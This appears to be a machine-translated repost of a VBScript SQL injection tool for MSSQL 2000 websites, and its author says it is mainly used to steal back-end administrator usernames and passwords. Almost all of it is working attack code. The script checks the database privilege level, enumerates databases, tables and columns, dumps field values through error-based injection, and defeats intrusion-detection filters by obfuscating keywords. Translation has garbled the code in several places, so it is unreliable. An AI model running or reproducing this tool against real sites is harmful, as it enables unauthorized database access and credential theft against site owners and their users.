Known problems with this version:
First, the page parsing should use regular expressions instead of splitting on fixed strings.
Second, the loop stops as soon as a returned value is longer than 30 characters. I assume no table or column name exceeds 30 characters, but a field value can, so this cut-off is not good enough. Since the tool is mostly used to pull the back-end administrator's username and password, I left it as it is.
Copy codeThe Code is as follows: set arg = wscript. arguments
If (LCase (Right (Wscript. fullname, 11) = "Wscript. Exe") Then
Wscript. Quit
End If
If arg. count = 0 then
Usage ()
Wscript. Quit
End If
Sub usage ()
Wsh. echo string (79 ,"*")
Wsh. echo "at present, only the mssql explicit and error modes are supported. directly write the url as the numeric type, write the url as the numeric type, and include the url with double quotation marks in the url"
Wsh. echo "sqlids v0.7 for mssql2000 with error by lcx"
Wsh. echo "the following two scripts can be used for mutual reference"
Wsh. echo "http://www.jb51.net/article/14172.htm"
Wsh. echo "http://hi.baidu.com/myvbscript/blog/item/5c9b29124a3fa55bf919b878.html"
Wsh. echo "Usage :"
Wsh. echo "cscript" & wscript. scriptname & "url limit | -----------> get current permission" & vbcrlf & "Ex: cscript SQL. vbs http://ww.x.com/1.asp? Id = 1 limit"
Wsh. echo "cscript" & wscript. scriptname & "url dbname | -----------> get all database names" & vbcrlf & "Ex: cscript SQL. vbs http://ww.x.com/1.asp? Id = 1 dbname"
Wsh. echo "cscript" & wscript. scriptname & "url table database name | --------> get all the table names of the given Database" & vbcrlf & "Ex: cscript SQL. vbs http://ww.x.com/1.asp? Id = 1 table
Master"
Wsh. echo "cscript" & wscript. scriptname & "url filed database name table name | ----------> obtain all fields of the table given to the Database" & vbcrlf & "Ex: cscript SQL. vbs http://ww.x.com/1.asp?
Id = 1 filed master spt_server_info"
Wsh. echo "cscript" & wscript. scriptname & "url result field name database name table name | ---> obtain the field value of the given database, table, and field" & vbcrlf & "Ex: cscript SQL. vbs http://ww.x.com/1.asp?
Id = 1 result id master sysinfo"
Wsh. echo "cscript" & wscript. scriptname & "url search the field name you want to search for | ---> search the field by keyword" & vbcrlf & "Ex: cscript SQL. vbs http://ww.x.com/1.asp? Id = 1 search
Pass"
Wsh. echo string (79, "*") & vbcrlf
End Sub
Function getHTTPPage (Path)
T = GetBody (Path)
GetHTTPPage = BytesToBstr (t, "GB2312 ")
End Function
Function UrlEncode (str)
Str = Replace (str, "", "% 20 ")
UrlEncode = str
End Function
Function GetBody (url) 'xml to get the webpage source code, which can be changed to cookie or get to submit
On Error Resume Next
Aurl = Split (url ,"? ") 'This is submitted for post
Set Retrieval = CreateObject ("Microsoft. XMLHTTP ")
With Retrieval
. Open "post", Aurl (0), False ,"",""
. SetRequestHeader "Content-Type", "application/x-www-form-urlencoded"
. SetRequestHeader "Accept-Encoding", "gzip, deflate"
. SetRequestHeader "User-Agent", "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; Server Load balancer;. net clr 2.0.50727; Media Center PC 5.0;. NET CLR
3.0.04506;. net clr 1.1.4322 )"
. SetRequestHeader "Connection", "Keep-Alive"
. SetRequestHeader "Cache-Control", "no-cache"
. Send UrlEncode (Aurl (1) 'Post submit
GetBody =. ResponseBody
. Abort
End
Set Retrieval = Nothing
End Function
Function BytesToBstr (Body, Cset)
Dim objstream
Set objstream = CreateObject ("adodb. stream ")
Objstream. Type = 1
Objstream. Mode = 3
Objstream. Open
Objstream. Write Body
Objstream. Position = 0
Objstream. Type = 2
Objstream. Charset = Cset
BytesToBstr = objstream. ReadTExt
Objstream. Close
Set objstream = Nothing
End Function
Function ReplaceKeyWord (Value) 'bypasses ids.
Table = "select-> se % lect | [k] | insert-> in % sert | [k] | update-> u % pdate | [k] | delete-> dele % te | [k] | drop-> dr % op | [k] | alter-> al % ter | [k] | create-> crea % te | [k] | inner-> in %
Ner | [k] | join-> jo % in | [k] | from-> fro % m | [k] | where-> w % here | [k] | union -> unio % n | [k] | group-> grou % p | [k] | by-> B % y | [k] | having-> hav % ing | [k] | table-> tab % le | [k] | shutdown-
> Shu % tdown | [k] | kill-> k % ill | [k] | declare-> dec % lare | [k] | open-> o % pen | [k] | pwdencrypt-> pwdencr % ypt | [k] | msdasql-> m % sdasql | [k] | sqloledb-> sqlo % ledb | [k] | char-> c % har |
[K] | fetch-> fe % tch | [k] | nExt-> ne % xt | [k] | allocate-> al % locate | [k] | sys-> s % ys | [k] | raiserror-> raiser % ror | [k] | Exec-> e % xec | [k] | =! -> = %! | [K] | --->-%-| [k] | xp _-> x % p _ | [k]
| Sp _-> s % p _ | [k] | and-> a % nd"
Dim I, Relpacement, Temp
Relpacement = Split (Table, "| [k] | ")
ReplaceKeyWord = Value
For I = 0 to UBound (Relpacement)
Temp = Split (Relpacement (I), "-> ")
If UBound (Temp) = 1 Then ReplaceKeyWord = Replace (ReplaceKeyWord, Temp (0), Temp (1 ))
NExt
End Function
Function result (sHTMLTEMP) 'use varchar as a keyword to separate webpage content. use regular expressions to make it easier.
AHTML = Split (sHTMLTEMP, "varchar ")
If (UBound (aHTML)> 0) Then
SHTMLTEMP = aHTML (1)
AHTML = Split (sHTMLTEMP ,"'")
SHTMLTEMP = aHTML (1)
End If
Result = sHTMLTEMP
End Function
Function Str2HEx (strHEx) 'SQL hexadecimal conversion Function
Dim sHEx
For I = 1 To Len (strHEx)
SHEx = sHEx & HEx (Asc (Mid (strHEx, I, 1) & "00"
NExt
Str2HEx = "0x" & sHEx
End Function
Function Str2HExtwo (strHEx) 'SQL hexadecimal conversion Function
Dim sHEx
For I = 1 To Len (strHEx)
SHEx = sHEx & HEx (Asc (Mid (strHEx, I, 1 )))
NExt
Str2HExtwo = "0x" & sHEx
End Function
Function MoveR (Rstr) 'deduplication
Dim I, SpStr
SpStr = Split (Rstr ,",")
For I = 0 To Ubound (Spstr)
If I = 0 then
MoveR = MoveR & SpStr (I )&","
Else
If instr (MoveR, SpStr (I) = 0 and I = Ubound (Spstr) Then
MoveR = MoveR & SpStr (I)
Elseif instr (MoveR, SpStr (I) = 0 Then
MoveR = MoveR & SpStr (I )&","
End If
End If
NExt
End Function
Function page (SQL)
Page = Replace (getHTTPPage (url & "& ReplaceKeyWord (SQL), Chr (34 ),"")
End Function
Url = arg (0)
Injection = arg (1)
'-------------------------------------- The following code is an injection statement without quotation marks.
Select case arg (1)
Case "limit"
Body = Replace (getHTTPPage (url), Chr (34 ),"")
'Statement is proposed separately for later modification. The first is sa, and the second is DB_owner.
Sqlone = "and (select is_srvrolemember (0x730079007300610064006D0069006E00)> 0 --"
Sqltwo = "and (select is_member (0x640062005F006F0077006E0065007200)> 0 --"
Bodyone = page (sqlone)
Bodytwo = page (sqltwo)
Wsh. echo "current information :"
If Len (body) = Len (Bodyone) Then wsh. echo "SA"
If Len (body) = Len (Bodytwo) And Len (body) <> Len (Bodyone) Then
Wsh. echo "DB_owner"
Else
Wsh. echo "PUBLIC"
End If
Sqlthtree = "and @ servername> 0 -- | and @ version> 0 -- | and user> 0 -- | and db_name ()> 0 --"
Rtemp = Split (sqlthtree, "| ")
Servername = result (page (rtemp (0 )))
Version = result (page (rtemp (1 )))
User = result (page (rtemp (2 )))
Db_name = result (page (rtemp (3 )))
Wsh. echo "servername:" & servername
Wsh. echo "version:" & version
Wsh. echo "user:" & user
Wsh. echo "db_name:" & db_name
Case "dbname"
I = 1
Do
SQL = "and db_name (" & I & ")> 0 --" 'database name statement
Body = page (SQL)
K = Limit Rev (body, "varchar",-1, 0)
I = I + 1
If k <> 0 Then
Wscript. echo result (body)
Else
Wsh. echo "========= over ==================="
End if
Loop Until k = 0
Case "table"
I = 1
Do
'Table name statement agr (2) indicates the database
SQL = "and 0 <> (select top 1 name from" & arg (2 )&". dbo. sysobjects where xtype = 0x7500 and name not in (select top "& I &" name from "& arg (2 )&". dbo. sysobjects
Where xtype = 0x7500 ))--"
Body = page (SQL)
K = Limit Rev (body, "varchar",-1, 0)
I = I + 1
If k <> 0 Then
Wscript. echo result (body)
Else
Wsh. echo "========= over ==================="
End if
Loop Until k = 0
Case "filed"
Sqlbiaoid = "an % d (se % l % e % c % t to % p 1 ca % st (id as nvarch % ar (20) % 2bch % ar (124) fr % om ["& arg (2) &"] .. [sy % sob % je % cts] wh % ere name = "& Str2HEx (arg (3) &") = 0 --
"
Biaoid = result (page (sqlbiaoid ))
Biaoid = Replace (biaoid, Chr (124 ),"")
Sqlclounmcnt = "an % d (se % l % e % c % t ca % st (co % unt (1) as varch % ar (10 )) % 2bch % ar (94) fr % om ["& arg (2) &"] .. [sys % columns] wh % ere id = "& biaoid &") = 0 --"
K = Replace (result (page (sqlclounmcnt), Chr (94 ),"")
Wsh. echo "A total of column names" & k"
For I = 1 To k
Sqlfiled = "an % d (se % l % e % c % t to % p 1 ca % st (name as varch % ar (8000 )) fr % om (se % l % e % c % t to % p "& I &" colid, name fr % om ["& arg (2) &"] .. [sys % columns] wh % ere
Id = "& biaoid &" order by colid) t order by colid desc) = 0 --"
Wsh. echo result (page (sqlfiled ))
NExt
Case "result"
I = 1
Sqlcloum = "and (select cast (count (1) as varch % ar (8000) % 2 bchar (94) from [" & arg (3) & "] .. ["& arg (4) &"] where 1 = 1)> 0 -- "'Statement of the total number of violent Columns
K = result (page (sqlcloum ))
K = Replace (k, Chr (94 ),"")
Wsh. echo arg (2) & "Total number of records in the field" & k & "& vbcrlf
For I = 1 To k
Sqlneirong = "an % d (se % l % e % c % t to % p 1 ca % st (" & arg (2) & "as varch % ar) % 2bch % ar (94) fr % om (se % l % e % c % t to % p "& I &" ["& arg (2) & "] fr % om [" & arg (3) & "] .. ["& arg (4)
& "] Wh % ere 1 = 1 order by [" & arg (2) & "]) t wh % ere 1 = 1 order by [" & arg (2) & "] desc) = 0 --"
Body = page (sqlneirong)
Wscript. echo Replace (result (body), Chr (94 ),"")
Next
Case "search"
Love = Str2HExtwo (arg (2 ))
Wscript. echo "Please wait, query, and only 10 columns are displayed. The result is displayed in 'table name | field name' format"
TimeSpend = Timer
For I = 1 To 10' you can change this 10 as needed
Sqlsearch = "And (select/**/top/**/1/**/t_name % 2 bchar (124) % 2bc_name/**/from/**/(select/**/top/**/"& I &"/**/object_name (id) /**/as/**/t_name, name /*
*/As/**/c_name/**/from/**/syscolumns/**/where/**/charindEx (cast ("& love &"/**/ as/***/varchar (2000 )), name) % 3E0/**/and/**/left (name, 1 )! = 0x40/**/order /*
*/By/**/t_name/**/asc) /**/as/**/T/**/order/**/by/**/t_name/**/desc)> 0 --"
Body = page (sqlsearch)
Body = result (body)
A = a & body &","
NExt
TimeSpend = round (Timer-TimeSpend, 2)
Wsh. echo MoveR ()
Wsh. echo "time:" & TimeSpend & "seconds ."
Case Else
If arg (1) <> "limit" Or arg (1) <> "dbname" Or arg (1) <> "search" Or arg (1) <> "table" Or arg (1) <> "filed" Then
Wscript. echo "note Parameters"
Usage ()
End if
End select